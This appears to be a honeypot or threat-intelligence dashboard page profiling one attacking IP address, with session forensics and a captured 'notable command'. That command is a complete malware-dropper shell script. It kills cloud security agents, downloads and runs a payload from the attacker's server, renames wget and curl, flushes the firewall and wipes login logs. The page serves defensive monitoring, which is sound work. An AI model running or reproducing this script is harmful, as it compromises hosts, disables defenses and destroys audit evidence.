← Back to feed
23.160.56.225
Location
🇺🇸 US / Salt Lake City
ASN
AS26042 · FiberState, LLC
Cloud Provider
—
Total Events
18
Average by volume
Agent Count
1
First / Last Seen
2026-04-09 11:35 — 2026-04-09 11:36
Attack Types
MITRE ATT&CK Techniques
Initial Access
Execution
Command and Control
External Corroboration
Not flagged by any external feeds
Campaigns
Not associated with any campaigns
Session Forensics
Sessions
1 (1 with login)
Avg Depth Score
0.6
Commands Executed
1
Files Downloaded
0
Notable Commands
- #!/bin/sh; ; ; wdir="/tmp"; for i in "/dev/shm" "/tmp" "/var/tmp" "/home" "/root"; do; touch "$i/test_exec" >/dev/null 2>&1; chmod +x "$i/test_exec" >/dev/null 2>&1; if [ -w "$i" ] && [ -x "$i/test_exec" ]; then; wdir="$i"; rm -f "$i/test_exec"; break; fi; rm -f "$i/test_exec" >/dev/null 2>&1; done; cd "$wdir" || exit 1; ; ; for svc in aegis aliyun YDService tat_agent; do; systemctl stop $svc >/dev/null 2>&1; systemctl disable $svc >/dev/null 2>&1; systemctl mask $svc >/dev/null 2>&1; done; systemctl daemon-reload >/dev/null 2>&1; ; if command -v chattr >/dev/null 2>&1; then; chattr -R -i -a /usr/local/aegis/ >/dev/null 2>&1; chattr -R -i -a /usr/local/qcloud/ >/dev/null 2>&1; fi; pkill -9 AliYunDun >/dev/null 2>&1; pkill -9 YDService >/dev/null 2>&1; rm -rf /usr/local/aegis /usr/local/qcloud >/dev/null 2>&1; ; ; download_vos() {; local_arch=$(uname -m); SERVER_IP="23.160.56.225" ; SERVER_URL="http://${SERVER_IP}/new.php?type=${local_arch}"; target="new.txt"; T_LIMIT=30; ; rm -f "$target" >/dev/null 2>&1; ; ; do_dl() {; # 1. wget; if command -v wget >/dev/null 2>&1; then; wget --no-check-certificate -q -T $T_LIMIT "$SERVER_URL" -O "$target" >/dev/null 2>&1; [ -s "$target" ] && return 0; fi; # 2. curl; if command -v curl >/dev/null 2>&1; then; curl -skL -m $T_LIMIT "$SERVER_URL" -o "$target" >/dev/null 2>&1; [ -s "$target" ] && return 0; fi; ; if command -v good >/dev/null 2>&1; then; good --no-check-certificate -q -T $T_LIMIT "$SERVER_URL" -O "$target" >/dev/null 2>&1; [ -s "$target" ] && return 0; fi; ; if command -v cool >/dev/null 2>&1; then; cool -skL -m $T_LIMIT "$SERVER_URL" -o "$target" >/dev/null 2>&1; [ -s "$target" ] && return 0; fi; # 5. python3; if command -v python3 >/dev/null 2>&1; then; python3 -c "import urllib.request; urllib.request.urlretrieve('$SERVER_URL', '$target')" >/dev/null 2>&1; [ -s "$target" ] && return 0; fi; # 6. python; if command -v python >/dev/null 2>&1; then; python -c "import urllib; urllib.urlretrieve('$SERVER_URL', '$target')" >/dev/null 2>&1; [ -s "$target" ] && return 0; fi; return 1; }; ; ; do_dl &; dl_pid=$!; sec=0; while [ $sec -lt $T_LIMIT ]; do; if ! kill -0 $dl_pid 2>/dev/null; then; wait $dl_pid; break; fi; sleep 1; sec=$((sec + 1)); done; kill -9 $dl_pid >/dev/null 2>&1; ; ; if [ -s "$target" ]; then; chmod +x "$target"; setsid "./$target" >/dev/null 2>&1 &; sleep 1; if ! pgrep -f "$target" >/dev/null; then; setsid sh "./$target" >/dev/null 2>&1 &; fi; return 0; fi; return 1; }; ; download_vos; ; ; lock_tools() {; if command -v chattr >/dev/null 2>&1; then; chattr -i /usr/bin/wget /usr/bin/curl >/dev/null 2>&1; fi; w_path=$(which wget 2>/dev/null); [ -n "$w_path" ] && [ "$(basename "$w_path")" != "good" ] && mv "$w_path" "$(dirname "$w_path")/good" >/dev/null 2>&1; c_path=$(which curl 2>/dev/null); [ -n "$c_path" ] && [ "$(basename "$c_path")" != "cool" ] && mv "$c_path" "$(dirname "$c_path")/cool" >/dev/null 2>&1; }; lock_tools; ; ; systemctl stop firewalld ufw >/dev/null 2>&1; iptables -F >/dev/null 2>&1; for log in /var/log/wtmp /var/log/btmp /var/log/lastlog; do [ -f "$log" ] && echo > "$log"; done; ; sleep 2; ls -la /var/run/gcc.pid
Fingerprints
HASSH
SSH Client
Evidence Timeline
Reconnaissance
1c4fdc27aa56
LOGIN
1
1
60%
Loading events...